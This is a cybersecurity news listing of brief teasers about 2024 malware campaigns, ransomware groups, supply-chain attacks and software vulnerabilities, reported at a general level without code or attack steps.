News

North Korean Hackers Unleash New Malware in Targeted Attacks

Cybersecurity experts have detected two new malware strains, KLogEXE and FPSpy, linked to a North Korean hacking group. The group, identified as Kimsuky (also known by several aliases), has been active for over a decade and is notorious for its spear-phishing techniques, often tricking victims into downloading malicious software. According to a recent report, these …

North Korean Hackers Unleash New Malware in Targeted Attacks Read More »

New ‘SnipBot’ Malware Variant Linked to Data Theft Attacks

A newly discovered variant of the RomCom malware, named SnipBot, has been identified in a wave of cyberattacks aimed at stealing sensitive data from compromised systems. According to a report, SnipBot infiltrates networks, allowing attackers to extract valuable information and move laterally within organizations. Researchers uncovered SnipBot during a deep analysis of a specific DLL …

New ‘SnipBot’ Malware Variant Linked to Data Theft Attacks Read More »

Storm-0501 Identified as a Key Player in Hybrid Cloud Ransomware Attacks

Storm-0501, a known cybercriminal group, has been actively targeting key sectors in the U.S., including government, manufacturing, transportation, and law enforcement, in a series of ransomware attacks This campaign, identified by researchers, aims to exploit hybrid cloud environments, moving from on-premises infrastructure to cloud platforms, leading to data theft, credential harvesting, system tampering, and ultimately, …

Storm-0501 Identified as a Key Player in Hybrid Cloud Ransomware Attacks Read More »

New Malware Targets Developers Through Infected Python Packages

A recent cyber campaign linked to North Korean threat actors is using compromised Python packages to distribute a new malware strain known as PondRAT. This malware appears to be a streamlined version of POOLRAT (also called SIMPLESEA), a previously identified macOS backdoor attributed to the Lazarus Group, which was involved in the 3CX supply chain …

New Malware Targets Developers Through Infected Python Packages Read More »

New Octo2 Android Trojan Unleashes Powerful Device Takeover Features

Cybersecurity experts have uncovered a new version of the notorious Android banking trojan, Octo, now enhanced with advanced capabilities for device takeover and fraudulent transactions. The updated malware, dubbed Octo2 by its creator, has been found in ongoing campaigns across European countries such as Italy, Poland, Moldova, and Hungary, as revealed by a recent report. …

New Octo2 Android Trojan Unleashes Powerful Device Takeover Features Read More »

Cyberattacks Hit Transportation Firms with Malware

Transportation and logistics companies across North America are facing a new wave of phishing attacks delivering information-stealing malware and remote access trojans (RATs). According to recent reports, these campaigns exploit legitimate email accounts from compromised transport and shipping companies to inject malicious content directly into ongoing email threads. So far, at least 15 breached email …

Cyberattacks Hit Transportation Firms with Malware Read More »

Chinese Hackers Exploit GeoServer Flaw to Launch Attacks

A cyber espionage group suspected to be operating from China has launched targeted attacks on a Taiwanese government organization and possibly other countries in the Asia-Pacific (APAC) region by exploiting a recently patched security vulnerability in OSGeo GeoServer GeoTools. The attack, identified by researchers in July 2024, has been attributed to an advanced persistent threat …

Chinese Hackers Exploit GeoServer Flaw to Launch Attacks Read More »

Necro Malware Hidden in Popular Play Store Camera and Browser Apps

The discovery of Necro malware in widely-used camera and browser apps on the Play Store has raised alarms, although it’s still unclear how the apps were initially compromised. Experts suspect that a malicious software development kit (SDK) used to integrate advertising features may be the source of the breach. First identified by a Russian cybersecurity …

Necro Malware Hidden in Popular Play Store Camera and Browser Apps Read More »

Brazilian Hackers Launch SambaSpy Malware Through Phishing

A new malware named SambaSpy has been discovered exclusively targeting users in Italy through a sophisticated phishing campaign. The cyberattack, attributed to a Brazilian Portuguese-speaking threat group, raises concerns as it focuses solely on Italian victims, which is unusual since most attackers tend to aim for a wider audience to maximize their gains. According to …

Brazilian Hackers Launch SambaSpy Malware Through Phishing Read More »

Hackers Target Healthcare with New INC Ransomware Attacks

Microsoft has reported that a ransomware group known as Vanilla Tempest has begun targeting healthcare organizations using a new strain of ransomware called INC Ransom. This ransomware-as-a-service (RaaS) operation has been active since July 2023, attacking various public and private entities, including Yamaha Motor Philippines and the U.S. branch of Xerox Business Solutions, as well …

Hackers Target Healthcare with New INC Ransomware Attacks Read More »

Massive ‘Raptor Train’ Botnet Hijacks Over 200,000 IoT Devices

Cybersecurity experts have uncovered a sophisticated botnet, dubbed “Raptor Train,” that has infected more than 200,000 small office/home office (SOHO) and Internet of Things (IoT) devices globally. This botnet is believed to be operated by a suspected Chinese state-sponsored group known as Flax Typhoon. It has been active since at least May 2020, with its …

Massive ‘Raptor Train’ Botnet Hijacks Over 200,000 IoT Devices Read More »

New Malware Trap Locks Your Browser to Steal Google Passwords

A new malware campaign uses an unusual technique to trap users in their browser’s kiosk mode, coercing them into entering their Google credentials. Once entered, these credentials are stolen by a piece of information-stealing malware. This attack operates by locking the user’s browser on Google’s login page and preventing them from closing the window. The …

New Malware Trap Locks Your Browser to Steal Google Passwords Read More »

Windows Flaw Exploited by Hackers: CISA Urges Immediate Action

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent directive for federal agencies to secure their systems against a recently patched zero-day vulnerability in Windows, known as MSHTML (CVE-2024-43461). This flaw was exploited by the hacking group Void Banshee in a series of infostealer malware attacks. Initially disclosed during Microsoft’s Patch Tuesday, …

Windows Flaw Exploited by Hackers: CISA Urges Immediate Action Read More »

Ransomware Gangs Exploit Microsoft Azure Tools for Data Theft

Ransomware groups, such as BianLian and Rhysida, have adopted a new technique to steal sensitive data by abusing Microsoft Azure’s tools, particularly Azure Storage Explorer and AzCopy. These tools, designed to manage cloud storage and transfer data within Microsoft’s cloud ecosystem, are now being manipulated to extract large amounts of data from breached networks and …

Ransomware Gangs Exploit Microsoft Azure Tools for Data Theft Read More »

Vo1d Malware Hits 1.3 Million Android TV Boxes in Global Cyberattack

A new malware strain known as Vo1d has infected nearly 1.3 million Android-based TV boxes worldwide, affecting users in 197 countries. The malware primarily targets devices running outdated versions of the Android operating system, spreading rapidly across Brazil, Morocco, Pakistan, Saudi Arabia, Argentina, Russia, Tunisia, Ecuador, Malaysia, Algeria, and Indonesia. According to a report by …

Vo1d Malware Hits 1.3 Million Android TV Boxes in Global Cyberattack Read More »

Malware Targets Android Users to Steals Financial Data

Since November 2023, a new Android malware called Ajina.Banker has been targeting bank customers across Central Asia, focusing on stealing financial information and intercepting two-factor authentication (2FA) messages. According to researchers, the malware is distributed via Telegram channels, disguised as legitimate apps related to banking, payment services, and even government utilities. The attackers rely on …

Malware Targets Android Users to Steals Financial Data Read More »

New Trojan Targets Android Users for Banking Fraud

Cybersecurity researchers have identified a new version of the Android banking trojan, TrickMo, which uses advanced techniques to avoid detection and steal users’ banking credentials. This malicious software tricks users into revealing sensitive information by displaying fake login screens and employing various anti-analysis mechanisms, including malformed ZIP files and a dropper app that avoids detection. …

New Trojan Targets Android Users for Banking Fraud Read More »

Cybercriminals Exploit HTTP Headers to Steal Credentials in Phishing Attacks

Cybersecurity experts have raised alarms about a wave of phishing attacks leveraging HTTP headers to deploy fake email login pages designed to steal credentials. Unlike typical phishing methods that rely on HTML content, these attacks manipulate the HTTP response header before the HTML loads. This allows the phishing page to automatically reload without user interaction, …

Cybercriminals Exploit HTTP Headers to Steal Credentials in Phishing Attacks Read More »

PEAKLIGHT Downloader Targets Windows Users with Fake Movie Downloads

Cybersecurity experts have identified a new malware dropper called PEAKLIGHT that is being used in cyberattacks targeting Windows users through malicious movie downloads. This newly discovered dropper functions as a stealthy vehicle, enabling the launch of various harmful software, such as information stealers and other types of malware loaders. The dropper is designed to operate …

PEAKLIGHT Downloader Targets Windows Users with Fake Movie Downloads Read More »

New Phishing Attack on Insurance Firms with Modified Quasar RAT

The Colombian insurance sector has come under attack by a threat actor known as Blind Eagle, who has been using a customized version of the Quasar Remote Access Trojan (RAT) since June 2024. This group, also referred to as AguilaCiega, APT-C-36, and APT-Q-98, has a history of targeting organizations and individuals in South America, with …

New Phishing Attack on Insurance Firms with Modified Quasar RAT Read More »

Hackers Unleash New Data Theft Malware in Attacks on Government Networks

A China-based cyber espionage group, known as Mustang Panda, has been identified using new malware tools, FDMTP and PTSOCKET, in recent attacks to infiltrate government networks and steal sensitive data. The group, also referred to as HoneyMyte, Bronze President, Earth Preta, Polaris, or Stately Taurus, has shifted to new strategies, focusing primarily on cyber-espionage against …

Hackers Unleash New Data Theft Malware in Attacks on Government Networks Read More »

New Malware Uses Google Sheets to Steal Sensitive Data

A new malware campaign, featuring a previously unknown backdoor named “Voldemort,” is targeting organizations worldwide by posing as tax authorities from various countries, including the U.S., Europe, and Asia. According to a recent report, this campaign began on August 5, 2024, and has already sent over 20,000 phishing emails to more than 70 different organizations, …

New Malware Uses Google Sheets to Steal Sensitive Data Read More »

North Korean Hackers Exploit LinkedIn Job Offers to Spread Malware

North Korean cybercriminals have been using LinkedIn to target developers through fake job recruitment schemes, according to a recent report. These attackers leverage LinkedIn’s job posting platform to lure victims, often developers in the Web3 sector, into a false sense of security by pretending to offer coding challenges as part of a job application process. …

North Korean Hackers Exploit LinkedIn Job Offers to Spread Malware Read More »

New Malware Impersonates VPN to Target Users

Cybersecurity experts have identified a new malware campaign targeting users by disguising itself as the Palo Alto Networks GlobalProtect VPN tool. The malware poses a significant threat by executing remote PowerShell commands, downloading and exfiltrating files, encrypting communications, and evading sandbox detection, according to a recent report. The malware employs a sophisticated two-stage process that …

New Malware Impersonates VPN to Target Users Read More »

New Android Trojan ‘Rocinante’ Masquerades as Banking Apps to Steal User Data

Android users are currently under attack by a new malware campaign featuring a banking trojan named Rocinante. This malware disguises itself as legitimate banking applications to steal sensitive information from unsuspecting victims. The malware, identified by cybersecurity researchers, uses Android’s Accessibility Service to perform keylogging and display phishing screens that mimic various banks to steal …

New Android Trojan ‘Rocinante’ Masquerades as Banking Apps to Steal User Data Read More »

New Rust-Based Ransomware ‘Cicada3301’ Hits Windows and Linux Systems

Cybersecurity experts have discovered a new ransomware strain named Cicada3301, bearing similarities to the now inactive BlackCat (also known as ALPHV) operation. The ransomware primarily targets small and medium-sized businesses (SMBs) through opportunistic attacks that exploit system vulnerabilities, according to a report from a cybersecurity researcher. Cicada3301, written in the Rust programming language, is capable …

New Rust-Based Ransomware ‘Cicada3301’ Hits Windows and Linux Systems Read More »

New Phishing Attack Uses QR Codes and Microsoft Sway to Steal Login Details

Cybersecurity experts are sounding the alarm on a new phishing campaign that uses QR codes—referred to as quishing—to steal user credentials by exploiting Microsoft Sway. The campaign takes advantage of the platform’s infrastructure to host fake login pages, once again showcasing how legitimate cloud services can be misused for malicious purposes. “Attackers use trustworthy cloud …

New Phishing Attack Uses QR Codes and Microsoft Sway to Steal Login Details Read More »

BlackSuit Ransomware Breach Exposes Data of Nearly 1 Million from Software Provider

A recent ransomware attack by BlackSuit has compromised the personal data of 954,177 individuals, prompting a mass notification effort by the affected software vendor, now known as Connexure. The Atlanta-based firm, which specializes in software solutions for the employer stop-loss insurance market, is informing nearly a million people about the breach, which occurred on April …

BlackSuit Ransomware Breach Exposes Data of Nearly 1 Million from Software Provider Read More »

Ransomware Payments Soar to Nearly $460 Million in First Half of 2024

In the first half of 2024, ransomware payments have surged to an astonishing $459.8 million, setting the stage for a potential record-breaking year if the current pace continues. This marks a slight increase from the same period in 2023, where ransomware payments totaled $449.1 million, leading to a record $1.1 billion by year’s end. Despite …

Ransomware Payments Soar to Nearly $460 Million in First Half of 2024 Read More »

NGate Malware Clones Contactless Payment Cards via NFC Data Theft

Cybersecurity experts have identified a new strain of Android malware, known as NGate, designed to siphon contactless payment data from victims’ physical credit and debit cards. The stolen data is relayed to a device controlled by attackers, enabling them to carry out fraudulent transactions. This new threat, dubbed NGate by researchers, has been observed targeting …

NGate Malware Clones Contactless Payment Cards via NFC Data Theft Read More »

New macOS Malware ‘Cthulhu Stealer’ Targets User Data

Cybersecurity experts have identified a new piece of malware targeting Apple macOS systems, emphasizing the growing interest of cybercriminals in Apple’s operating system. Named ‘Cthulhu Stealer,’ this malware is designed to harvest a wide array of user data from macOS devices, showcasing how threat actors are increasingly focusing on Apple users. Launched in late 2023, …

New macOS Malware ‘Cthulhu Stealer’ Targets User Data Read More »

New ‘Sedexp’ Linux Malware Conceals Credit Card Skimmers

Cybersecurity experts have discovered a new, stealthy Linux malware that uses an unusual technique to establish persistence on infected systems while concealing credit card skimmer code. The malware, named ‘sedexp’ by a cybersecurity incident response team, is attributed to a financially motivated group and has been active since 2022. The researchers highlighted that ‘sedexp’ is …

New ‘Sedexp’ Linux Malware Conceals Credit Card Skimmers Read More »

New Msupedge Backdoor Exploits PHP Vulnerability

A newly discovered backdoor named Msupedge has been deployed in a cyber attack against an unnamed university in Taiwan. The backdoor is notable for its use of DNS traffic to communicate with its command-and-control (C&C) server, according to the report. The attack likely began by exploiting a critical vulnerability in PHP (CVE-2024-4577, CVSS score: 9.8), …

New Msupedge Backdoor Exploits PHP Vulnerability Read More »

Hackers Use Fake Brand Sites to Spread DanaBot and StealC Malware

Cybersecurity researchers have uncovered a sophisticated campaign where cybercriminals are mimicking legitimate brands to spread malware such as DanaBot and StealC. This operation, led by Russian-speaking hackers and known as Tusk, involves several sub-campaigns that exploit the credibility of well-known brands. By creating fake websites and social media profiles, these hackers trick users into downloading …

Hackers Use Fake Brand Sites to Spread DanaBot and StealC Malware Read More »

Banshee Stealer Malware Targets Over 100 Browser Extensions on macOS

Cybersecurity researchers have discovered a new stealer malware specifically designed for Apple macOS systems. Named Banshee Stealer, this malware is being sold on the cybercrime market for $3,000 per month and is compatible with both x86_64 and ARM64 architectures. “Banshee Stealer is highly versatile, targeting numerous browsers, cryptocurrency wallets, and about 100 browser extensions,” reported …

Banshee Stealer Malware Targets Over 100 Browser Extensions on macOS Read More »

Attackers Linked to Black Basta Use SystemBC Malware

A new social engineering campaign connected to the Black Basta ransomware group has been identified, targeting users with credential theft attempts and deploying a malware dropper known as SystemBC. According to researchers, the attackers use a consistent tactic: sending an initial email bomb followed by phone calls pretending to offer a fake solution. These calls …

Attackers Linked to Black Basta Use SystemBC Malware Read More »

New Phishing Scheme Targets Mobile Banking Users

Mobile users in the Czech Republic are being targeted by a new phishing campaign that uses a Progressive Web Application (PWA) to steal banking credentials. The attacks have specifically targeted customers of ÄŒeskoslovenská obchodní banka (CSOB) in the Czech Republic, OTP Bank in Hungary, and TBC Bank in Georgia, according to cybersecurity firm. The phishing …

New Phishing Scheme Targets Mobile Banking Users Read More »

Major WordPress Plugin Flaw Puts 100,000+ Sites at Risk

A severe security vulnerability has been identified in the GiveWP donation and fundraising plugin for WordPress, which puts more than 100,000 websites at risk of remote code execution attacks. This flaw, officially tracked as CVE-2024-5932 with a perfect CVSS score of 10.0, affects all plugin versions prior to 3.14.2. The vulnerability was reported by a …

Major WordPress Plugin Flaw Puts 100,000+ Sites at Risk Read More »

Cybercriminals Use Fake Websites to Spread DanaBot and StealC Malware

Cybersecurity experts have uncovered a sophisticated malware campaign in which attackers mimic well-known brands to distribute harmful software like DanaBot and StealC. This campaign, orchestrated by Russian-speaking cybercriminals under the codename “Tusk,” includes multiple sub-campaigns that exploit the trust users place in reputable platforms. These attackers lure victims into downloading malware through fake websites and …

Cybercriminals Use Fake Websites to Spread DanaBot and StealC Malware Read More »

Mandrake Spyware Resurfaces in Google Play Store Apps After 2 Years

A sophisticated Android spyware known as Mandrake has reappeared, hidden within five apps that were available on the Google Play Store for two years without detection. According to the report, these applications garnered over 32,000 installations before they were finally removed from the platform. The majority of these downloads occurred in countries such as Canada, …

Mandrake Spyware Resurfaces in Google Play Store Apps After 2 Years Read More »

New Go-Based Backdoor GoGra Targets South Asian Media Outlet

A previously unknown Go-based backdoor called GoGra was used in a cyberattack against a media organization in South Asia. According to a report, GoGra is written in the Go programming language and utilizes the Microsoft Graph API to communicate with a command-and-control (C&C) server hosted on Microsoft mail services. The exact method of delivery for …

New Go-Based Backdoor GoGra Targets South Asian Media Outlet Read More »

FBI and CISA Alert on BlackSuit Ransomware Demanding Up to $500 Million

The FBI and the U.S. Cybersecurity and Infrastructure Security Agency (CISA) have issued an updated warning about a dangerous ransomware strain known as BlackSuit, which has reportedly demanded ransoms as high as $500 million. In one instance, a single ransom demand reached a staggering $60 million. According to the advisory, BlackSuit ransomware attackers are open …

FBI and CISA Alert on BlackSuit Ransomware Demanding Up to $500 Million Read More »

New Phishing Scam Exploits Google Drawings and WhatsApp Links

Cybersecurity experts have uncovered a new phishing campaign that cleverly utilizes Google Drawings and shortened links generated through WhatsApp to evade detection and deceive users into clicking on fraudulent links designed to steal sensitive information. According to the report, the attackers have carefully chosen widely trusted platforms like Google and WhatsApp to host and deliver …

New Phishing Scam Exploits Google Drawings and WhatsApp Links Read More »

New Malware Targets 300,000 Users with Malicious Extensions

A widespread malware campaign has recently been detected, affecting over 300,000 users by installing rogue extensions in Google Chrome and Microsoft Edge browsers. This malware is being distributed through trojan software, which users unwittingly download from fake websites that mimic popular software platforms. According to report, the trojan carries a variety of harmful components. These …

New Malware Targets 300,000 Users with Malicious Extensions Read More »

New Android Trojan BingoMod Drains Funds and Erases Devices

Cybersecurity experts have identified a newly emerging Android remote access trojan (RAT) named BingoMod. This malicious software is capable of not only stealing money from infected devices but also wiping them clean to cover its tracks. The researcher noted that the malware is still being actively developed. Evidence suggests that the trojan may be the …

New Android Trojan BingoMod Drains Funds and Erases Devices Read More »

SideWinder Cyber Attacks Target Maritime Sites

The nation-state cyber threat actor known as SideWinder has been linked to a new espionage campaign aimed at maritime facilities and ports located in the Indian Ocean and Mediterranean Sea regions. This campaign has been uncovered which identified that the spear-phishing attacks are targeting several countries, including Pakistan, Egypt, Sri Lanka, Bangladesh, Myanmar, Nepal, and …

SideWinder Cyber Attacks Target Maritime Sites Read More »

Facebook Ads Lead Users to Fake Sites Stealing Credit Card Data

Facebook users have become targets of an extensive scam e-commerce network that employs hundreds of fraudulent websites to steal personal and financial information. These fake sites are designed to impersonate well-known brands and use deceptive advertising techniques to lure victims. The researhcer uncovered the campaign on April 17, 2024, and dubbed it “ERIAKOS” due to …

Facebook Ads Lead Users to Fake Sites Stealing Credit Card Data Read More »

Chameleon Trojan Masquerades as CRM App to Steal Banking Data

Cybersecurity researchers have uncovered a new technique used by the Chameleon Android banking trojan, which targets users in Canada by posing as a Customer Relationship Management (CRM) app. Researcher reported on Monday that Chameleon was seen disguising itself as a CRM app, specifically targeting a Canadian restaurant chain with international operations. This campaign, detected in …

Chameleon Trojan Masquerades as CRM App to Steal Banking Data Read More »

Hackers Exploit ISP to Spread Malicious Updates

In mid-2023, the China-linked cyber espionage group Evasive Panda compromised an unnamed internet service provider (ISP) to distribute malicious software updates to target companies. This attack demonstrates the increasing sophistication of the group. Evasive Panda, also known as Bronze Highland, Daggerfly, and StormBamboo, has been active since at least 2012. The group is known for …

Hackers Exploit ISP to Spread Malicious Updates Read More »

New Android Trojan BlankBot Steals Financial Data

Cybersecurity researchers have uncovered a new Android banking trojan called BlankBot, targeting Turkish users to steal their financial information. According to the analysis published last week, BlankBot possesses several malicious capabilities, including customer injections, keylogging, screen recording, and communication with a control server via a WebSocket connection. Discovered on July 24, 2024, BlankBot is currently …

New Android Trojan BlankBot Steals Financial Data Read More »

AI Cybercrime Service Bundles Phishing Kits with Malicious Apps

A Spanish-speaking cybercrime group named GXC Team has been observed bundling phishing kits with malicious Android applications, enhancing their malware-as-a-service (MaaS) offerings. Researcher has been tracking this e-crime actor since January 2023. They describe the crimeware solution as a “sophisticated AI-powered phishing-as-a-service platform” that targets users of more than 36 Spanish banks, government bodies, and …

AI Cybercrime Service Bundles Phishing Kits with Malicious Apps Read More »

Stargazer Goblin Creates 3,000 Fake GitHub Accounts to Spread Malware

A threat actor known as Stargazer Goblin has established a network of fake GitHub accounts to run a Distribution-as-a-Service (DaaS) operation, spreading various information-stealing malware and earning $100,000 in illicit profits over the past year. This network, dubbed “Stargazers Ghost Network”, comprises over 3,000 accounts on GitHub. These accounts manage thousands of repositories used to …

Stargazer Goblin Creates 3,000 Fake GitHub Accounts to Spread Malware Read More »

New Phishing Scam Targets OneDrive Users with Malicious Script

Cybersecurity researchers are alerting the public about a new phishing campaign aimed at Microsoft OneDrive users, intending to execute a harmful PowerShell script. “This campaign relies heavily on social engineering tactics to trick users into running a PowerShell script, which compromises their systems,” said security researcher. The cybersecurity firm is monitoring this clever phishing and …

New Phishing Scam Targets OneDrive Users with Malicious Script Read More »

Gh0st RAT Trojan Targets Users Through Fake Chrome Site

The remote access trojan known as Gh0st RAT has been detected being delivered by an “evasive dropper” called Gh0stGambit. This is part of a drive-by download scheme specifically targeting Chinese-speaking Windows users. These infections originate from a fake website, “chrome-web[.]com,” which serves malicious installer packages disguised as Google’s Chrome browser. This indicates that users searching …

Gh0st RAT Trojan Targets Users Through Fake Chrome Site Read More »

New Malware ‘FrostyGoop’ Targets Energy Company

Cybersecurity researchers have discovered what they identify as the ninth Industrial Control Systems (ICS)-focused malware. This malware was used in a disruptive cyber attack targeting an energy company. Industrial cybersecurity firm has named the malware FrostyGoop. They describe it as the first malware to directly use Modbus TCP communications to sabotage operational technology (OT) networks. …

New Malware ‘FrostyGoop’ Targets Energy Company Read More »

Over 100,000 Malware Android Apps Steal OTP Codes

A new malicious campaign has been identified, using Android apps to steal users’ SMS messages since at least February 2022. These apps are part of a large-scale effort to intercept one-time passwords (OTPs) used for online account verification, facilitating identity fraud. The campaign involves over 107,000 unique malicious app samples, designed to intercept OTPs. “Of …

Over 100,000 Malware Android Apps Steal OTP Codes Read More »

Middle Eastern Military Personnel Targeted by GuardZoo Malware

Military personnel across the Middle East are being targeted by a surveillance operation deploying an Android data-gathering tool named GuardZoo. This campaign, initiated around October 2019, is believed to be orchestrated by a Houthi-aligned group. This conclusion is based on various factors, including the nature of the application lures, command-and-control (C2) server logs, targeting patterns, …

Middle Eastern Military Personnel Targeted by GuardZoo Malware Read More »

Malicious PyPI Package Steals Google Cloud Credentials

Cybersecurity researchers have uncovered a malicious package on the Python Package Index (PyPI) that targets macOS systems to steal Google Cloud credentials. The package, named “lr-utils-lib,” was uploaded in early June 2024 and downloaded 59 times before being removed. It targets a specific group of macOS machines using predefined hashes to steal Google Cloud authentication …

Malicious PyPI Package Steals Google Cloud Credentials Read More »

New Phishing Scam Targets CrowdStrike Users

CrowdStrike has issued a warning about a new phishing campaign aimed at German customers, exploiting the recent Falcon Sensor update mishap to distribute fake installers. On July 24, 2024, CrowdStrike detected a sophisticated spear-phishing attempt distributing a counterfeit CrowdStrike Crash Reporter installer through a website impersonating a German organization. This fake site was created on …

New Phishing Scam Targets CrowdStrike Users Read More »

Security-Bypassing Tool Advertised by FIN7 on Dark Web

The financially motivated FIN7 group has been seen using various aliases across underground forums to promote a security-evasion tool used by ransomware groups such as AvosLocker, Black Basta, BlackCat, LockBit, and Trigona. The tool, named AvNeutralizer (also known as AuKill), was developed by FIN7 to disable security solutions. This tool has been marketed in the …

Security-Bypassing Tool Advertised by FIN7 on Dark Web Read More »

Scattered Spider Uses RansomHub and Qilin Ransomware in Attacks

The notorious cybercrime group known as Scattered Spider has incorporated ransomware strains RansomHub and Qilin into its operations, according to Microsoft. Scattered Spider, recognized for its advanced social engineering tactics, targets organizations to gain access and persist for further exploitation and data theft. The group is also known for attacking VMWare ESXi servers and deploying …

Scattered Spider Uses RansomHub and Qilin Ransomware in Attacks Read More »

Trojanized jQuery Packages Detected on npm and GitHub

Unknown threat actors have been spreading compromised versions of jQuery on npm, GitHub, and jsDelivr, indicating a complex and persistent supply chain attack. Researcher analysis highlights the attack’s distinctiveness due to the variability among the packages. The attackers have hidden the malware within the rarely-used ‘end’ function of jQuery, which is internally called by the …

Trojanized jQuery Packages Detected on npm and GitHub Read More »

‘Eldorado’ Ransomware Targets Windows and Linux Systems

A new ransomware-as-a-service (RaaS) operation named Eldorado has emerged, targeting both Windows and Linux systems with locker variants. Eldorado was first announced on March 16, 2024, in an advertisement for its affiliate program on the ransomware forum RAMP. The firm, having infiltrated the ransomware group, identified the representative as a Russian speaker and confirmed that …

‘Eldorado’ Ransomware Targets Windows and Linux Systems Read More »

Hackers Exploit CrowdStrike Glitch to Distribute Remcos RAT

CrowdStrike, a leading cybersecurity firm, is facing backlash after a recent flawed update caused widespread IT disruptions. This update error has now led to cybercriminals exploiting the situation by distributing Remcos RAT malware under the guise of a hotfix. The attack unfolds through a ZIP archive named “crowdstrike-hotfix.zip,” which contains a malware loader known as …

Hackers Exploit CrowdStrike Glitch to Distribute Remcos RAT Read More »

APT40 Quickly Adapts to New Cyber Threats

Cybersecurity agencies from Australia, Canada, Germany, Japan, New Zealand, South Korea, the U.K., and the U.S. have issued a joint advisory about the China-linked cyber espionage group APT40, highlighting its ability to rapidly adopt new exploits for security vulnerabilities shortly after they are publicly disclosed. “APT40 has previously targeted organizations in various countries, including Australia …

APT40 Quickly Adapts to New Cyber Threats Read More »

Mekotio Banking Trojan Targets Financial Institutions

Financial institutions in Latin America are facing threats from the Mekotio banking trojan, also known as Melcoz. The researchers reports a recent surge in cyberattacks distributing this Windows malware. Mekotio, active since 2015, targets countries like Brazil, Chile, Mexico, Spain, Peru, and Portugal, aiming to steal banking credentials. First documented in August 2020, Mekotio is …

Mekotio Banking Trojan Targets Financial Institutions Read More »

GootLoader Malware Continues to Evolve with New Threats

The GootLoader malware is still actively used by cybercriminals to deliver various malicious payloads to compromised systems. “Recent updates have led to several versions of GootLoader, with GootLoader 3 currently being the most active,” stated cybersecurity firm in their analysis published last week. “Although the specifics of the GootLoader payloads have evolved, the infection methods …

GootLoader Malware Continues to Evolve with New Threats Read More »

Hackers Attack Global Infrastructure with Ransomware

Suspected hackers from China and North Korea have been linked to ransomware and data encryption attacks targeting government and critical infrastructure worldwide from 2021 to 2023. Two distinct groups are involved in these activities. One is associated with ChamelGang (aka CamoFei), while the other overlaps with Chinese and North Korean state-sponsored groups. ChamelGang’s attacks include …

Hackers Attack Global Infrastructure with Ransomware Read More »

Security Risks Found in Common Industrial Gas Analyzers

Researchers have identified several security vulnerabilities in Emerson Rosemount gas chromatographs that could be exploited by malicious actors to access sensitive information, cause denial-of-service (DoS) conditions, and execute arbitrary commands. These vulnerabilities affect the GC370XA, GC700XA, and GC1500XA models, specifically versions 4.1.5 and earlier. Researcher highlighted that the vulnerabilities include two command injection flaws and …

Security Risks Found in Common Industrial Gas Analyzers Read More »

Android Users at Risk from Spyware Hidden in Popular Apps

The hacker group Transparent Tribe continues its campaign of distributing malware-laden Android apps through social engineering tactics, aiming to infiltrate the devices of targeted individuals. According to a new report, these APKs represent the group’s ongoing strategy of embedding spyware into video browsing applications. Recently, they’ve expanded their focus to include mobile gamers, weapons enthusiasts, …

Android Users at Risk from Spyware Hidden in Popular Apps Read More »

Rust-Based P2PInfect Botnet Adds Mining and Ransomware

The peer-to-peer botnet known as P2PInfect has started targeting misconfigured Redis servers with ransomware and cryptocurrency miners. This evolution shows the botnet’s shift from a dormant state with unclear motives to a financially driven operation. “With the latest updates to its crypto miner, ransomware payload, and rootkit elements, the malware author continues to profit from …

Rust-Based P2PInfect Botnet Adds Mining and Ransomware Read More »

Intel CPUs Vulnerable to ‘Indirector’ Side-Channel Attack

Modern Intel CPUs, including Raptor Lake and Alder Lake, have been found to be susceptible to a new side-channel attack, dubbed Indirector, which could be exploited to leak sensitive data. The attack, discovered by researchers exploits weaknesses in the Indirect Branch Predictor (IBP) and the Branch Target Buffer (BTB), bypassing current defenses and compromising CPU …

Intel CPUs Vulnerable to ‘Indirector’ Side-Channel Attack Read More »

FakeBat Malware Spreads Through Drive-by Downloads

The loader-as-a-service (LaaS) known as FakeBat has become one of the most prevalent loader malware families this year, spread primarily through drive-by download attacks. “FakeBat is mainly designed to download and execute subsequent payloads like IcedID, Lumma, RedLine, SmokeLoader, SectopRAT, and Ursnif,” the company stated in a recent analysis. Drive-by download attacks involve tactics such …

FakeBat Malware Spreads Through Drive-by Downloads Read More »

New Credit Card Skimmer Targets Popular CMS Platforms

A new credit card skimmer named Caesar Cipher Skimmer has been found targeting major content management systems (CMS) like WordPress, Magento, and OpenCart. A web skimmer is a type of malware injected into e-commerce sites to steal financial and payment data. According to the report, this latest campaign involves maliciously altering the checkout PHP file …

New Credit Card Skimmer Targets Popular CMS Platforms Read More »

Linux RansomHub Ransomware Hits VMware ESXi VMs

The RansomHub ransomware operation, active since February 2024, is now utilizing a Linux-based encryptor specifically designed to attack VMware ESXi environments in corporate settings. This ransomware-as-a-service (RaaS) operation has connections with ALPHV/BlackCat and Knight ransomware and has affected over 45 victims in 18 countries. The discovery of both Windows and Linux encryptors for RansomHub was …

Linux RansomHub Ransomware Hits VMware ESXi VMs Read More »

New SnailLoad Attack Reveals Users’ Web Activities

A team of security researchers has unveiled a novel side-channel attack technique called SnailLoad, which can remotely deduce a user’s web activity. “SnailLoad leverages a universal bottleneck in internet connections,” the researchers explained in their recent study. This bottleneck affects network packet latency, allowing attackers to infer ongoing network activity on another person’s internet connection. …

New SnailLoad Attack Reveals Users’ Web Activities Read More »

Polyfill Supply Chain Attack Impacts Over 110,000 Websites

Google has blocked ads for e-commerce sites using the Polyfill.io service after a Chinese company acquired the domain and altered the JavaScript library (“polyfill.js”) to redirect users to malicious sites. According to the report, this supply chain attack affects over 110,000 websites that utilize the library. Polyfill is a widely-used library that adds modern functionality …

Polyfill Supply Chain Attack Impacts Over 110,000 Websites Read More »

Kimsuky Uses Chrome Extension to Steal Data

The North Korean hacking group known as Kimsuky is employing a new malicious Google Chrome extension named TRANSLATEXT to steal sensitive information as part of their ongoing intelligence operations. Researcher discovered this activity in early March 2024, noting that the extension collects email addresses, usernames, passwords, cookies, and browser screenshots. This targeted campaign focuses on …

Kimsuky Uses Chrome Extension to Steal Data Read More »

Hackers Exploit WordPress Plugins to Create Rogue Admins

Multiple WordPress plugins have been compromised to inject malicious code, enabling the creation of rogue administrator accounts that can perform arbitrary actions. According to the report, the injected malware creates a new administrative user account and sends those details back to an attacker-controlled server. Additionally, malicious JavaScript is injected into the website’s footer to add …

Hackers Exploit WordPress Plugins to Create Rogue Admins Read More »

Oyster Backdoor Spread via Fake Software Downloads

